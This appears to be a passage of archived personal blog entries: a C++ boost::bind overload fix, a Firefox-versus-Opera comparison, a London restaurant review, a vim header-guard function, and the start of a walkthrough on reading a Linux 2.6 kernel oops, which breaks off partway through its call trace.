
boost::bind and <unresolved overloaded function type>

Note: This entry has been restored from old archives.

I had a hard time Googling a solution to this particular woe. Alas, the exact string “unresolved overloaded function type” doesn’t give anything useful alongside “boost::bind” or “boost::mem_fn“. This is the typical sort of error message from g++:

foo.cpp:18: error: no matching function for call to
    'bind(<unresolved overloaded function type>,
        const boost::reference_wrapper<FooMaster>, boost::arg<1> (&)())'

I’ve generated this using a rather contrived example based on the use pattern that was causing my woe:

#include <iostream>
#include <string>
#include <boost/bind.hpp>

class FooMaster {
public:
    void foo(std::string &s) {
        std::cout << "foo(s=" << s << ")" << std::endl;
    }

    void foo(int x) {
        std::cout << "foo(x=" << x << ")" << std::endl;
    }
};  
    
int main(int argc, char **argv) {
    FooMaster fm;
    boost::bind(&FooMaster::foo, boost::ref(fm), _1)(10);
    return 0;
}

The problem is obvious, of course; it is exactly as the compiler is telling you. Mr Compiler has no idea which “foo” you’re talking about. “But Mr Compiler, it is obvious!” you say. “I’m not passing it a bloody string!” Sometimes you just have to accept that Mr Compiler isn’t you and needs a little hand-holding.

The issue clearly boils down to FooMaster having two methods that match &FooMaster::foo. This expression, used to instantiate the bind template, doesn’t take the arguments into account, so which foo are we talking about?! Alas, as obvious as the problem was, I didn’t find the solution so obvious; I just don’t cut it as a C++ guy sometimes. I’d given up on the problem in fact, but then I stumbled on a solution while looking into some other problem I had. It was one of those “oh, duh!” moments really: I was looking at some code that assigned a member function pointer, and the type specification for such a thing includes the argument types! So here’s a modified main that uses one extra step to explain to the compiler what we want:

int main(int argc, char **argv) {
    FooMaster fm;
    // Create a variable of the desired function signature type and assign
    // using desired member function.  This will resolve the correct
    // function thanks to the signature including the argument types.
    void (FooMaster::*fn)(int) = &FooMaster::foo;
    // Now pass the function variable to the template method so that it knows
    // exactly which function we mean.
    boost::bind(fn, boost::ref(fm), _1)(10);
    return 0;
}

All you have to do is give Mr Compiler a little bit of a helping hand…

Joy!

Firefox Slowness Redux

Note: This entry has been restored from old archives.

While I did get around to my one-extension-at-a-time testing of Firefox slowness I still haven’t got around to writing more about it. My rough observations are the following:

  1. The longer Firefox is running the slower everything gets. As much as I’d love to turn my computer off every night and start afresh every morning, the fact is that the best I can really do, without wasting time every morning, is put it into suspend (I work at home and maintain a lot of state on my computer.) Another solution would be to stop-start Firefox every now and then, since it’ll reload my last set of open tabs/windows on starting; I really shouldn’t have to do that though, and it leads to point 2…
  2. More tabs seems to mean more slowness. I tend to be tab-happy; like my 20-desktop(+tabs) spaces of state, I find keeping stuff open in the browser simpler than worrying about “saving tabsets” and bookmarking everything (and trying to work out one end of the “history” from the other is just not going to work.) To this end I tend to have two or three browser windows open at a time with up to three rows of tabs in each. The slowness isn’t Firefox hitting swap, so it must be something else (Firefox memory use seems to grow linearly with the number of tabs open; fair enough I guess, since memory is cheap these days.) Maybe a plugin or extension, but I haven’t tried the incremental-plugin/extension-addition + tab-growth experiment.
  3. The “SwitchProxy Tool” extension does seem to cause slowness. I’m confounded as to why it should be so!
  4. The “Google Browser Sync” extension also causes slowness. Again, I have no idea why, but it does a pretty complicated job.

That’s all I have to report. And AFAIC “problem solved!” “How so?!” you ask? Simple: I’ve mostly stopped using Firefox. Over the last few weeks I’ve been making a gradual switch to Opera. Oh no! It’s closed-source evilware! shrug It is:

  1. Faster (oh, so much faster!), more responsive when I have 50 tabs open in three windows.
  2. No longer encumbered with that annoying ad panel.
  3. Now equipped (in the current beta) with native browser-sync functionality. This is nice since Google Browser Sync has become, for me, the most important Firefox feature. That said, I don’t know how “trusted” the Opera browser sync is and it certainly doesn’t seem to be as comprehensive as the Google offering. I expect Opera sync will be expanded in time.
  4. No more of a memory hog than Firefox (as far as I can see, but I haven’t tested this exhaustively.)
  5. Binary packaged for every distro I use and there’s an apt repository (though without Ubuntu dists, my sources.list line on Ubuntu gutsy is for Debian testing.)

On the downsides:

  1. Has occasional problems with Flash, which require a browser restart, but luckily Opera comes back up with all my windows and tabs rather quickly. Yes, in an ideal world there’d be no Flash, wank, wank. Flash is a “fact of life” as far as the web goes these days, and IMO it gives us some useful things that XHTML/CSS can’t. This particular problem is my most pressing issue with Opera at the moment.
  2. No less of a memory hog than Firefox. This is based on occasional glances at top while running both, not any proper testing!
  3. Much less of a CPU hog than Firefox but still pretty bad at idle sometimes. However, this is mostly the fault of websites; it just seems that Opera keeps a tighter hold on not letting a site’s javascript get out of hand. For example, having smh.com.au open in Firefox really bogs it down, while Opera remains responsive (albeit at a constant ~10% CPU usage on my desktop.) It should be noted that the smh.com.au site runs some particularly disgusting javascript.
  4. Hitting sites that “don’t work in Opera” is more common than “don’t work in Firefox”, but the Web’s become pretty good in this regard these days so this is fairly rare.

It should be noted that I’m using a beta version of Opera (on Ubuntu Gutsy.)

There are things I haven’t tried or worked out with Opera yet. Namely:

  1. What’s on offer as far as equivalents to the Firebug and Web Developer Firefox extensions go. I haven’t had to do any HTML/CSS debugging for a while.
  2. AdBlock Plus equivalent? I think there might be one out there, but I have to admit I’m not hunting since I’ve kind of fallen out of love with auto-updated ad blocking, it was blocking things I wanted to see sometimes. Opera does have a “content block” feature and I use it to block out particularly bad ads and ad-iframes (anything I see that is large, or overtly bright, or animated.)

I haven’t spent much time looking into equivalent Opera functionality as I have everything I need for day-to-day browsing “out of the box.” However, I just found “Opera equivalents to Firefox extensions” and “Opera equivalents to Firefox extensions II” which look like a pretty good starting point!

In conclusion: I’m converted to Opera. It has its downsides, but so does Firefox, and my feeling at the moment is that Firefox is more annoying than Opera.

Coq d’Argent

Note: This entry has been restored from old archives.

It was that time again, time to go out to a great restaurant as a “make up” dinner because I’d had to bugger off somewhere and leave Kat alone for a week. Such creatures become unhappy when left to fend for themselves for too long. Exactly where to eat is always the problem, there are so many interesting restaurants in London. I juggled around a few names I remembered and tried to find somewhere that definitely had squirrel on the menu at the moment, but no luck there. So, something different at least? We normally do very Italian style food, so how about French? A couple of names came to mind and on the back of seeing a lot of good reviews it was Coq d’Argent we chose.

Coq d’Argent can be found on the roof of N° 1 Poultry, convenient for “City” folk (like Kat, who works only a 2 minute wander down the road.) Poultry/Coq is just the first witty pun. “Argent”, it seems, can be taken in two meanings: one being “money” (we’re in the banking district after all), and the other, from heraldry, “silver” (pretty much the same link to the City there I guess). So, the “Silver Rooster” on N° 1 Poultry in the financial district. Ho ho. Anyway, enough randomness, we’re in this for the food.

Entrée

Coq is a very French restaurant, complete with all the stereotypical French dishes. This left me with a bit of a conundrum when it came to the entrée, only two?! So we picked three. Kat had the cuisses de grenouille, which is frog’s legs to you and me. While I ordered the terrine de foie gras au jambon fumé, which doesn’t need translation I think! Then to share we had another dish that really speaks for itself: douzaine d’escargots.

Frog’s legs, foie gras, and snails: could we try any harder?

Timbale de cuisses de grenouille au vermouth, Avruga caviar et crème d’épinards.
(Frog legs and vermouth timbale with spinach cream and Avruga caviar.)
The timbale came with an escort of three little legs, nuggets of meat in a very light crispy batter complete with little bones sticking out. The legs were succulent and, I guess, a little like dark-meat on chicken. The timbale was delicately flavoured, so as to not overwhelm the leg meat it contained. The spinach cream (or: creamed spinach) and caviar topped off the whole dish well. Avruga caviar is actually a fancy name for a caviar made with herring roe, and my assessment of it was that it was rather good! (However have a look at that link to learn about the true nature of this “caviar”.)

Terrine de foie gras au jambon fumé, poire aigre-doux, purée de pruneaux.
(Foie gras and smoked ham terrine, pickled pears, prune compote and sherry vinegar caramel.)
Ah, foie gras, I don’t know how much the goose suffered but it was all worth it. A good rich terrine this, and a reasonably sized slice (for this day and age.) The “pickled pears” barely rated a mention, coming in about 10 pieces about 3mm to a side. Personally, I’d have preferred a few neat slices. That said, they’re really just there to lend some sharpness to cut the thick richosity of the terrine, and the prune compote came in a good dollop alongside a drizzle of the “vinegar caramel” (think darkened sugar syrup) that lent its own edge. I enjoyed every mouthful, even the ones Kat ate.

Douzaine d’escargots de Bourgogne au beurre d’ail et tomates.
(Twelve snails baked in garlic and tomato butter.)
Straight out of the French language textbook! (I studied French for three years in school, but somehow didn’t learn a thing.) There are always the snail horror stories you hear: “chewy little lumps of garlic flavoured rubber.” I’m glad to say we didn’t have such an experience; the dark little bodies of our snails, tucked delicately into their shells, were succulent and melt-in-the-mouth tender. I’m not sure what to compare them to actually. And you can’t go wrong with garlicky butter, especially when there’s bread nearby.

Main Course

That wraps up the first course, and what a beginning! I’d had some difficulty choosing my main course and ordering three really wasn’t going to be an option. Wanting something with a bit of meat to it I went for the filet de sanglier, wild boar. Kat eyed the fish for a while before actually choosing agneau rôti à la provençale, which was actually agneau de pré-salé, or salt-marsh lamb. This, despite the “salt” and related seaside environment, really isn’t quite fish. Right after the entrée I popped along to the bathroom and found the mains already on the table when I returned! A tad too speedy for my tastes I have to say; it must have been less than ten minutes between clearing firsts and laying out the seconds.

Agneau rôti à la provençale, jus au romarin.
(Salt marsh lamb with mini ratatouille, soft mash, pesto, anchovy fritter, black olives and rosemary jus.)
Kat’s main was a sizable serving, with three decent pieces of lamb (including a cutlet). The presentation was an amusing construction whereby an encircling wall of mash, dotted with olives and pesto, had been built around the core constituents of the dish and filled with a shallow pool of jus. That was the pinnacle of presentation for the evening, though every dish came with a strong dose of the art. (Something I have only a marginal respect for.) I found the anchovy fritter an unusual and maybe too cheffy device, essentially packaging for a condiment. However, this was a good solid dish and the lamb pink and juicy. This “salt marsh” lamb is talked up a lot but from the little I tasted and from Kat’s words I don’t think we recognised anything really special about this lamb. Don’t get me wrong though, it was very good lamb, I’m just not sure if it was amazingly, wonderfully good. I will have to endeavour to get myself a leg or shoulder of it for a more complete assessment.

Filet de sanglier sauce grand veneur, purée de marron et panais rôti.
(Wild boar fillet wrapped in pancetta with chestnut purée, roasted parsnip and grand veneur sauce.)
Three small medallions of fillet made this a much less substantial meal than Kat’s, but sufficient. Being served with one tiny, lonely baked onion (it’s not listed, so it’s a bonus I guess) and a couple of skinny sticks of parsnip certainly doesn’t bulk it out enough for those who measure enjoyment by volume! A good thing I fit less in and have a smaller appetite these days then! The chestnut purée was an excellent wetting agent for the plate, not something I’ve had before but something I’ve got to add to my repertoire. Now the sauce is a bit of an enigma: I tasted it and immediately recognised chocolate, and Kat agrees. If I’d thought to review the menu and seen “grand veneur” I’d have asked about it, but Kat said she saw mention of chocolate on the menu and I left it at that. The problem is that the online menu (which I used as reference for the names in this entry) says it is a grand veneur sauce. This is, essentially, a rather complicated stock reduction (a poivrade) thickened with blood and finished with redcurrant jelly and cream. There was certainly no hint of anything cream-like in the sauce with my meal! I suspect the answer to this puzzle is that the menu on the night was slightly different to what they have online, which is a fairly common occurrence (restaurant menus tend to be “live” documents.)

OK, I’ve written far too much about this dish now and not even approached the point yet… how was it? Good, the possibly-chocolate sauce and chestnut purée were a highlight and I’ve got to keep them in mind when I tackle game meats in future. But not brilliant, the “wild boar” lacked the sort of strong flavour I hoped for and what flavour it had was hard to find behind the flavour absorbed from the pancetta. Aside from my persnicketiness in regard to flavours the dish added up to something enjoyable, the boar tender and the sauces unusual and flavourful (maybe a little sweet, there I go again.)

Along with our mains we had a small rocket and parmesan salad, dressed with a good balsamico and, refreshingly, lemon juice. The acidity in the salad worked well, complementing the flavours in my main.

Dessert

There was certainly room for dessert, given the non-overzealous serving sizes, the small amount of bread (a good thing), and our choice to order only a very small salad as an extra. Kat went straight for the Catalan crème brûlée, which was an excellent and very rich rendition of this all-time favourite. I debated whether to have one with poached rhubarb or something much richer and chocolaty. I don’t normally go for chocolate desserts so decided to give it a go for a change and had the “Warm bitter chocolate and marmalade sabayon tart with orange ice sorbet.” It beat Kat’s dessert on richness, twice over at least! The tart filling was akin to a warm version of my richest chocolate mousse and the crust thin and crumbly; this balanced very well with the frigid tang of the sorbet. If anything the tart could have been just a little smaller.

The Rest

I didn’t have any wine with this meal, sticking to just water. I was glad to note that their still water was UK sourced and not imported from some ridiculous location. It was also supposedly “carbon neutral”, however they work that out. I almost always stick to tap water these days; water from Fiji? People are idiots. Anyway, the water was good, and its price a little less uncomfortable than the imported stuff’s.

Kat had a glass of Chianti, it was very good, you’d hope so at £11.50 for 125ml.

We dared espresso, and that was nothing special. I don’t really like espresso in France (based only on experience in Provence and Corsica) but it is very consistent and the coffee in Coq was authentic in that sense. Certainly better than the “English standard”, but then so is cow manure. (One day I might get off my old espresso high-horse, or maybe I’ll just move to Italy and shut up.)

The End

The service was great, not in-your-face as is all too common in the fancier restaurants. Pretty much a case of being there only when you want it but also always when you want it. In a rare act I actually rounded up the bill a bit on top of the auto-service-charge of 12.5%.

In the end the bill was £132.75, including the 12.5% “discretionary service charge”. That includes all the dishes mentioned above with £11.50 for a glass of wine, £3.75 for 750ml of water, and £5.00 for two espressos. Now that I scan over the bill I have to end the evening on a bit of a bum note: they charged me for a very random thing I never had! £6.75 for a “Chivas Regal”; at that price it can’t have been a very good one anyway, so I’m glad I didn’t have it. How the bloody hell that ended up on there I don’t know; oh well, maybe I’ll learn the lesson to check bills more carefully in future. Bit of a bummer, but £6.75 isn’t worth too much upset, and I have to accept part of the fault for not checking the bill as I should. (And I extra-tipped these incompetents! That’s totally unfair; from experience I know how easily these mistakes can creep in, and I don’t go in for the conspiracy theories.)

Overall, in our experience of “known” London restaurants, we’re rating this as our second-best meal to-date. (FYI, third is “The Providores”, which I never wrote about, and first is the “Neal Street Restaurant,” now sadly no more.) We’re likely to try Coq again in the summer, since there’s a huge and well presented outdoor space on top of the building (the space inside the circle and the wings on both sides of the orange roof in this zoomed-in version of the map link above.) It looks like a beautiful spot for a classy summer lunch or dinner.

Oh, we booked through the “D&D London” website again, worked out fine.

Vim Header Guard Trick

Note: This entry has been restored from old archives.

Quite some time ago a friend of mine at work supplied us with a magical vim binding that generated safe header guards. (And copyright/licence/doxygen preamble too!) The idea is that it automatically inserts the matching (#ifndef, #define, #endif) triplet and uses a guard that incorporates the file name and a suitably long random number. (The random number is what makes it “safe”, for example what if you have a “UTIL_H” but another library you’re using also has a “UTIL_H“?)

Today I went to use the trusty old insert-guard key-binding and saw: “shell returned 127“. The problem was a simple one: the vim binding called on a script written by yet another colleague, and I had copied my usual .vimrc over but not the required script, so the guard failed. Since I’m easily distracted I decided to work out a way to generate the guards that wouldn’t do this to me again, rather than just scp the script onto the system! I ended up with this:

" function to insert a C/C++ header file guard
function! s:InsertGuard()
  let randlen = 7
  let randnum = system("xxd -c " . randlen * 2 . " -l " . randlen . " -p /dev/urandom")
  let randnum = strpart(randnum, 0, randlen * 2)
  let fname = expand("%")
  let lastslash = strridx(fname, "/")
  if lastslash >= 0
    let fname = strpart(fname, lastslash+1)
  endif
  let fname = substitute(fname, "[^a-zA-Z0-9]", "_", "g")
  let randid = toupper(fname . "_" . randnum)
  exec 'norm O#ifndef ' . randid
  exec 'norm o#define ' . randid
  let origin = getpos('.')
  exec '$norm o#endif /* ' . randid . ' */'
  norm o
  -norm O
  call setpos('.', origin)
  norm w
endfunction

" keymap Ctrl-g to the InsertGuard function
map <silent> <C-g> :call <SID>InsertGuard()<CR>

It is still dependent on an external command, but if vim is installed then xxd is pretty likely to be around! (xxd is part of the vim toolset.) I wonder if it could be shorter? I didn’t find an obvious equivalent to “basename” in vim; I suspect there might be an alternative to ‘%‘ that gives what I want.
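(Later note: vim does have a built-in answer to “basename”, its filename modifiers. I believe expand("%:t") gives just the tail of the path, so the strridx/strpart dance in the function above could collapse to one line. An untested sketch:)

```vim
" ':t' keeps only the tail (basename) of the current file's path,
" replacing the strridx/strpart steps -- untested sketch
let fname = expand("%:t")
```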

An example of what it generates when you’re editing “src/util.h” and hit Ctrl-g:

#ifndef UTIL_H_668A545328A5CC
#define UTIL_H_668A545328A5CC

<existing file content>

#endif /* UTIL_H_668A545328A5CC */

Grokking Oopses

Note: This entry has been restored from old archives.

Introduction

Man it was hard to find information on debugging 2.6 kernel issues, maybe my Google skills need honing. Recently I was parachuted into a customer site on a support-or-die mission. The problem: kernel-space. My problem: not much kernel-space experience. A week of little sleep, much reading, and some learning. In the end the problem was rooted out and the crack team of kernel monkeys back at base blew it out of the water. Hooray!

This is the first in a trilogy of entries I intend to write. This one discusses a specific example of an “Oops” in detail, giving a line-by-line description of everything the oops tells you. Well, almost everything, some details go too deep to cover in something this introductory… to drill all the way down could take a whole textbook.

The second entry goes into relating the oops to the original code, I might call it “tracing assembly”. The third entry will delve into a session of debugging with ‘kdb’.

Now the first two entries will certainly happen as almost all the material was written during my work trip. (Joyful hours of trains, flights, and just plain waiting at stations and airports.) I won’t make any promises about the ‘kdb’ entry though, since I’ve written nothing for it and would need to spend quite a bit of time generating examples and traces.

Important items of note:

  • An IA32/i386 architecture/kernel is assumed; the oops code is platform dependent.
  • The oops examined here comes from a 2.6.16 kernel.
  • Sometimes file paths are given, these are relative to the root of a Linux 2.6.16 source tree.
  • This entry deals with a specific oops for a specific error case and doesn’t discuss much beyond the specific example.
  • There’s no guarantee, as far as I know, that the oops format won’t change at some time.

Finally, a disclaimer: I am not a kernel developer. In fact I learnt a couple of new things just writing these two entries. No doubt there are important facts I’ve missed or not rated highly enough. Maybe it is even possible that I’ve got something plain wrong (if so please correct me via the comments or email).

Oops!

Let us start where these things usually start, a kernel oops:

kernel: Unable to handle kernel paging request at virtual address 68230a7d
kernel: printing eip:
kernel: c0143742
kernel: *pde = 00000000
kernel: Oops: 0000 [#1]
kernel: SMP 
kernel: Modules linked in: monkey_pkt_eater nfnetlink_queue xt_condition
    iptable_ips edd ide_cd ip_nat_ftp ip_conntrack_ftp ipt_REDIRECT xt_tcpudp
    ipt_addrtype ebtable_nat ebtables ip_nat_mms ip_nat_pptp ip_nat_irc
    iptable_nat ip_conntrack_mms ip_conntrack_pptp ip_conntrack_irc af_packet
    ipt_logmark ipt_CONFIRMED ipt_confirmed ipt_owner ipt_REJECT sr_mod cdrom
    usb_storage evdev microcode parport_pc ppdev parport xt_state xt_NOTRACK
    iptable_raw iptable_filter ip_conntrack_netlink ip_nat ipt_LOG ip_conntrack
    ip_tables x_tables nfnetlink_log nfnetlink monkey e1000 capability
    commoncap loop sg ahci libata sd_mod scsi_mod
kernel: CPU:    0
kernel: EIP:    0060:[<c0143742>]    Tainted: PF     VLI
kernel: EFLAGS: 00210202   (2.6.16.43-54.5-smp #1) 
kernel: EIP is at put_page+0x2/0x40
kernel: eax: 68230a7d   ebx: 00000001   ecx: f1057680   edx: 68230a7d
kernel: esi: f6fe7600   edi: fe089b98   ebp: f64d3c14   esp: f64d3bbc
kernel: ds: 007b   es: 007b   ss: 0068
kernel: Process snort_inline (pid: 6298, threadinfo=f64d2000 task=dff3fa70)
kernel: Stack: <0>c02a8b4a f6fe7600 f1057020 c02a88d8 000004cd f9de0fdd c7af5000 f7802b60 
kernel: 0000c7af fe73e860 f64d3c48 f64d3c48 e7e19834 f64d3c34 f5b54cc0 00000000 
kernel: 00000001 c02c7adf 00200282 d94bd4cc f64d3c48 f4429a40 f64d3c40 f9dd912a 
kernel: Call Trace:
kernel: [<c02a8b4a>] skb_release_data+0x8a/0xa0
kernel: [<c02a88d8>] kfree_skbmem+0x8/0x80
kernel: [<f9de0fdd>] mkyDestroyPacket+0x9d/0x260 [monkey_pkt_eater]
kernel: [<c02c7adf>] ip_local_deliver_finish+0xef/0x270
kernel: [<f9dd912a>] mkyIpqPostHandler+0xda/0x140 [monkey_pkt_eater]
kernel: [<c02c79f0>] ip_local_deliver_finish+0x0/0x270
kernel: [<f8e9e182>] find_dequeue_entry+0x82/0x90 [nfnetlink_queue]
kernel: [<f8e9e1ab>] issue_verdict+0x1b/0x50 [nfnetlink_queue]
kernel: [<f8e9f5af>] nfqnl_recv_verdict+0x1ff/0x330 [nfnetlink_queue]
kernel: [<c0308730>] schedule+0x350/0xdd0
kernel: [<f887940e>] nfnetlink_rcv_msg+0x16e/0x200 [nfnetlink]
kernel: [<f8879542>] nfnetlink_rcv+0xa2/0x169 [nfnetlink]
kernel: [<c02beecd>] netlink_unicast+0x16d/0x250
kernel: [<c02bf462>] netlink_data_ready+0x12/0x50
kernel: [<c02be2d1>] netlink_sendskb+0x21/0x40
kernel: [<c02bfacd>] netlink_sendmsg+0x27d/0x320
kernel: [<c0116c88>] __wake_up+0x38/0x50
kernel: [<c02a2b2e>] sock_sendmsg+0xae/0xe0
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<c012f4c0>] autoremove_wake_function+0x0/0x50
kernel: [<f90caa7f>] monkey_chan_queue_append+0x15f/0x170 [monkey]
kernel: [<c02a9e4a>] verify_iovec+0x2a/0x90
kernel: [<c02a306d>] sys_sendmsg+0x15d/0x270
kernel: [<c02a3f86>] sys_recvfrom+0x116/0x140
kernel: [<f90557c0>] e1000_clean_rx_irq+0x0/0x3d0 [e1000]
kernel: [<f9053b0e>] e1000_clean+0x53e/0x780 [e1000]
kernel: [<f90c7780>] mkyGetState+0x20/0x30 [monkey]
kernel: [<f9ddbc90>] packet_writer+0x2e0/0xd50 [monkey_pkt_eater]
kernel: [<c02a453f>] sys_socketcall+0x24f/0x280
kernel: [<c013a5b0>] __do_IRQ+0xc0/0x110
kernel: [<c0102d3f>] sysenter_past_esp+0x54/0x75
kernel: Code: c0 8b 01 01 c2 83 fa 10 89 11 7f 05 83 fa f0 7d 0d f0 01 15 fc 8f
    40 c0 c7 01 00 00 00 00 c3 8d 76 00 8d bc 27 00 00 00 00 89 c2 <8b> 00 f6
    c4 40 75 1e 8b 42 04 40 74 1f f0 83 42 04 ff 0f 98 c0 

(This oops has had some timestamp details removed and has been wrapped for neatness. Also, some “proprietary symbols” have been renamed, let us just say: beware the monkey.)

Tackling the oops

Let me first say: thanks to the Internet containing cruft from all ages, you’ll find many references to ksymoops when researching kernel oopses. Stop now! Maybe add a “-ksymoops” to your search query, though this may remove several good links. It really is a battle against accumulated information. The ksymoops tool was useful for dealing with Linux 2.4 oopses, but in 2.6 its work is done at oops-time and ksymoops is useless. If you’re dealing with 2.6, forget about ksymoops.

On with the oops. It tells us quite a lot about what was going on when it occurred: we have the stack, the call path, the content of registers, and more. On inspection much of this is pretty straightforward to someone familiar with Linux, C programming, and Intel CPUs and assembly (be aware of GAS). It’s probably very hard going for someone who hasn’t done any work at that sort of level, but difficulty is just a good opportunity to learn! Right? However, like me, you don’t need to be a hard-core kernel hacker (I’m not even soft-core, I’d barely earn a PG rating) to get an idea of what’s going on.

Line by line

kernel: Unable to handle kernel paging request at virtual address 68230a7d

The core problem, and an oft-seen one; think of this as the “segfault” of the kernel. In actual fact both userspace and kernelspace memory access violations come from the same place (the MMU) and are handled by the same code. Generation of the oops text starting with this line has its origins in do_page_fault in the arch/i386/mm/fault.c code file. Think of that path as “i386 memory manager faults”. (“faults” covers a bunch of conditions, not just access violations.)

In short: something in the kernel has tried to use an address that doesn’t work, and that address was: 0x68230a7d.

kernel: printing eip:
kernel: c0143742
kernel: *pde = 00000000

Eip! It sounds like a small rodent’s cry of distress. It’s actually the “Extended Instruction Pointer”, which is the CPU register containing the address in memory of the instruction being executed. Thinking back to computer architecture classes you might be more familiar with this as the “Program Counter”. This tells us that at the time of the invalid paging request the instruction at address 0xc0143742 was being executed. A most useful bit of information that we’ll return to several times.

The “PDE” is the “Page Directory Entry”, and I’m not going to pursue that further. Try this article by Robert Collins, published in DDJ back in ’96, for more information: Understanding 4M Page Size Extensions on the Pentium Processor.

There’s a seriously large amount of information behind this that is worth reading up on. For starters try Google mixing “Linux Kernel” with a variety of things like “virtual memory”, “paging”, “mmu”, … From my bookshelf I’d recommend Chapter 2 of Understanding the Linux Kernel. That book is fairly bent towards Intel, I don’t have a book that covers deeper Intel specifics and can only recommend you make use of Google.

kernel: Oops: 0000 [#1]
kernel: SMP 

Now we’ve jumped to output generated by the die function in arch/i386/kernel/traps.c.

The first number is actually the error_code value passed to do_page_fault printed in hex. The interpretation for this is:

 *  bit 0 == 0 means no page found, 1 means protection fault
 *  bit 1 == 0 means read, 1 means write
 *  bit 2 == 0 means kernel, 1 means user-mode

So 0000 means “no page found” on “read” in “kernel” mode. This checks out with what we already know, consistency is good.

The number in the square brackets is the oops count. It is the number of times this die function has been called since boot, counting from 1. Usually you only want to worry about the first oops that you find. Everything after that point could be a side-effect of earlier kernel badness. If you’re working past the first oops then anything I have written here will be old news to you.

Yeah, and it is an SMP kernel. Other strings that may appear here are PREEMPT and DEBUG_PAGEALLOC. After this the somewhat mis-named show_registers function found in arch/i386/kernel/traps.c is called and the rest of the oops text is generated in or below this call.

kernel: Modules linked in: monkey_pkt_eater nfnetlink_queue xt_condition
    ...

This output is generated by a call to print_modules (kernel/modules.c) by show_registers. Usually one of these will be the culprit for your problem, module code tends to be less stable than core kernel code, especially proprietary modules!

kernel: CPU:    0

This message is coming from CPU 0. Obvious enough?

kernel: EIP:    0060:[<c0143742>]    Tainted: PF     VLI

Eip! Again. The value 0060 comes from the CS register, let’s ignore it. (Sorry!) After that we have the EIP address 0xc0143742 shown again. Now “Tainted“, sounds nasty doesn’t it? There are six single-char codes here, and they’re generated by the print_tainted function in kernel/panic.c. The codes represent a bunch of undesirable, yet legal, things that might have been done to the kernel. The first code is either ‘P‘ or ‘G‘; if the former then a non-GPL module has been loaded (as is the case here). If you have a ‘P‘ then don’t expect much support from kernel.org developers, unless the problem is obviously not related to non-kosher kernel modules. You’ll either want to work out the problem yourself, reproduce the problem without the proprietary module loaded, or get help from the vendor responsible for said module.

I’ll take a short-cut now and rip the comment from print_tainted to give the full list of flags:

 *  'P' - Proprietary module has been loaded.
 *  'F' - Module has been forcibly loaded.
 *  'S' - SMP with CPUs not designed for SMP.
 *  'R' - User forced a module unload.
 *  'M' - Machine had a machine check experience.
 *  'B' - System has hit bad_page.

The alternative character to all except ‘P‘ is a blank space (i.e. the flag is unset). In our oops we also have an ‘F‘ because one of the custom modules loaded is missing symbol version information. The ‘F‘ flag can come into the mix for a variety of reasons it seems, the canonical one being that `insmod -f` was used to load the module. None of the other “taints” are flagged in my example so I’m not going to detail them. (See the bottom of Documentation/oops-tracing.txt for more information.)
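For the record, a throwaway sketch (explain_taint is my own name, nothing from the kernel tree) that expands a taint string using the list above:

```shell
#!/bin/sh
# explain_taint: print a line for each taint flag set in a 2.6-era
# taint string such as "PF". (Hypothetical helper, my own name.)
explain_taint() {
    case "$1" in *P*) echo "proprietary module loaded" ;; esac
    case "$1" in *F*) echo "module forcibly loaded" ;; esac
    case "$1" in *S*) echo "SMP with CPUs not designed for SMP" ;; esac
    case "$1" in *R*) echo "user forced a module unload" ;; esac
    case "$1" in *M*) echo "machine check experience" ;; esac
    case "$1" in *B*) echo "system has hit bad_page" ;; esac
}

explain_taint "PF"
```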

One last note on “taint”: once a kernel is tainted it stays tainted. I.e. if you load a proprietary module it taints the kernel, and the ‘P‘ taint flag remains even if you unload it. You could think of it as a “from here on in all bets are off” state.

After the taint flags we have “VLI” and I don’t have a clue what this signifies. This is hard-coded in the i386 traps.c file, since it isn’t variable within the architecture I’ll dismiss it as unimportant!

kernel: EFLAGS: 00210202   (2.6.16.43-54.5-smp #1) 

This line first gives the CPU’s EFLAGS register, this register stores all the usual flags like “carry” as well as a bunch of less familiar flags (see link for more detail). After the flags, in brackets, is the version string identifying the kernel that generated the oops.

kernel: EIP is at put_page+0x2/0x40

Eip! Yet again, but now with some more useful information: the symbol covering the code EIP points into, EIP’s offset from that symbol (0x2), and the size of the code associated with the symbol (0x40, the distance between the put_page symbol and the next marked symbol).
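If you want to pull the pieces out of that symbol+0xoffset/0xsize string mechanically, a quick sed sketch does the job:

```shell
#!/bin/sh
# Split a "symbol+0xOFFSET/0xSIZE" string, as printed in the
# "EIP is at" line, into its three parts.
sym='put_page+0x2/0x40'
echo "$sym" | sed 's/^\(.*\)+\(0x[0-9a-f]*\)\/\(0x[0-9a-f]*\)$/symbol=\1 offset=\2 size=\3/'
# -> symbol=put_page offset=0x2 size=0x40
```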

kernel: eax: 68230a7d   ebx: 00000001   ecx: f1057680   edx: 68230a7d
kernel: esi: f6fe7600   edi: fe089b98   ebp: f64d3c14   esp: f64d3bbc
kernel: ds: 007b   es: 007b   ss: 0068

Now we finally get to the actual named purpose of the show_registers function: a dump of the contents of some CPU registers. It’s worth noting at this point that %edx and %eax both contain our dodgy address.

kernel: Process snort_inline (pid: 6298, threadinfo=f64d2000 task=dff3fa70)

Information about the current “process” being run on the CPU including pointers to the process’s thread and task structures. There will always be some process, but it may or may not be directly related to the error that caused the oops. When you’re debugging don’t jump to conclusions without good reason, keep following the trail of the oops.

kernel: Stack: <0>c02a8b4a f6fe7600 f1057020 c02a88d8 000004cd f9de0fdd c7af5000 f7802b60 
kernel: 0000c7af fe73e860 f64d3c48 f64d3c48 e7e19834 f64d3c34 f5b54cc0 00000000 
kernel: 00000001 c02c7adf 00200282 d94bd4cc f64d3c48 f4429a40 f64d3c40 f9dd912a 

The stack. Simply each word starting at %esp (the stack pointer) and continuing
to the base of the stack, or for kstack_depth_to_print words, a limit
configurable at kernel compile time. Some values in the stack can be related
to the next part of the oops, the “Call Trace“. Essentially, starting at %esp,
the call chain is traced:

kernel: Call Trace:
kernel: [<c02a8b4a>] skb_release_data+0x8a/0xa0
kernel: [<c02a88d8>] kfree_skbmem+0x8/0x80
kernel: [<f9de0fdd>] mkyDestroyPacket+0x9d/0x260 [monkey_pkt_eater]
kernel: [<c02c7adf>] ip_local_deliver_finish+0xef/0x270
kernel: [<f9dd912a>] mkyIpqPostHandler+0xda/0x140 [monkey_pkt_eater]
kernel: [<c02c79f0>] ip_local_deliver_finish+0x0/0x270
kernel: [<f8e9e182>] find_dequeue_entry+0x82/0x90 [nfnetlink_queue]
kernel: [<f8e9e1ab>] issue_verdict+0x1b/0x50 [nfnetlink_queue]
kernel: [<f8e9f5af>] nfqnl_recv_verdict+0x1ff/0x330 [nfnetlink_queue]
kernel: [<c0308730>] schedule+0x350/0xdd0
